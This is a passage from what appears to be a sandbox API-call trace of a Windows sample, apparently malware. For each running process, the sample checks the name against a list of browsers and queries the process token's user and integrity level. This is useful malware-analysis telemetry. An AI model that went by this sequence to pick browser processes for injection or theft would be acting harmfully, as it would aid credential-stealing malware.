IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.401] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0241.401] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0241.402] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0241.402] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0241.402] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0241.402] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0241.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0241.402] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.402] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.402] GetLastError () returned 0x7a [0241.402] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.402] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.403] CloseHandle (hObject=0xb8) returned 1 [0241.403] CloseHandle (hObject=0xb4) returned 1 [0241.403] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.403] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.403] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.403] GetLastError () returned 0x7a [0241.403] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.403] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.403] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.404] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0241.404] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0241.404] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0241.404] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0241.404] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0241.404] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0241.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0241.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0241.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0241.404] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.404] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.405] GetLastError () returned 0x7a [0241.405] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.405] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.405] CloseHandle (hObject=0xb8) returned 1 [0241.405] CloseHandle (hObject=0xb4) returned 1 [0241.405] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.405] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.405] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.406] GetLastError () returned 0x7a [0241.406] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.406] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.406] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.406] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0241.406] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0241.406] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0241.406] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0241.406] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0241.406] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0241.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0241.407] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.407] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.407] GetLastError () returned 0x7a [0241.407] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.407] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.407] CloseHandle (hObject=0xb8) returned 1 [0241.407] CloseHandle (hObject=0xb4) returned 1 [0241.407] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.408] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.408] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.408] GetLastError () returned 0x7a [0241.408] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.408] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.408] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.408] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0241.408] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0241.408] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0241.408] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0241.408] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0241.409] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0241.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0241.409] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.409] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.409] GetLastError () returned 0x7a [0241.409] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.409] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.409] CloseHandle (hObject=0xb8) returned 1 [0241.409] CloseHandle (hObject=0xb4) returned 1 [0241.410] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.410] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.410] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.410] GetLastError () returned 0x7a [0241.410] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.410] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.410] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.410] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0241.410] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0241.411] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0241.411] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0241.411] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0241.411] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0241.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0241.411] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.411] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.411] GetLastError () returned 0x7a [0241.411] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.411] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.411] CloseHandle (hObject=0xb8) returned 1 [0241.412] CloseHandle (hObject=0xb4) returned 1 [0241.412] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.412] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.412] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.412] GetLastError () returned 0x7a [0241.412] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.412] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.412] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.413] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0241.413] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0241.413] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0241.413] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0241.413] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0241.413] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0241.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0241.413] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.413] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.413] GetLastError () returned 0x7a [0241.413] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.414] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.414] CloseHandle (hObject=0xb8) returned 1 [0241.414] CloseHandle (hObject=0xb4) returned 1 [0241.414] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.414] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.414] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.414] GetLastError () returned 0x7a [0241.414] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.415] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.415] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.415] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0241.415] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0241.415] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0241.415] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0241.415] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0241.415] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0241.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0241.415] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.415] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.416] GetLastError () returned 0x7a [0241.416] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.416] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.416] CloseHandle (hObject=0xb8) returned 1 [0241.416] CloseHandle (hObject=0xb4) returned 1 [0241.416] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.416] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.416] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.417] GetLastError () returned 0x7a [0241.417] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.417] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.417] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.417] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0241.417] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0241.417] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0241.417] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0241.417] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0241.418] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0241.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0241.418] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.418] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.418] GetLastError () returned 0x7a [0241.418] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.418] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.418] CloseHandle (hObject=0xb8) returned 1 [0241.418] CloseHandle (hObject=0xb4) returned 1 [0241.418] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.419] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.419] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.419] GetLastError () returned 0x7a [0241.419] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.419] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.419] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.419] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0241.419] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0241.419] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0241.420] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0241.420] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0241.420] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0241.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0241.420] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.420] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.420] GetLastError () returned 0x7a [0241.420] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.420] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.420] CloseHandle (hObject=0xb8) returned 1 [0241.421] CloseHandle (hObject=0xb4) returned 1 [0241.421] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.421] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.421] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.421] GetLastError () returned 0x7a [0241.421] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.421] GetSidSubAuthorityCount 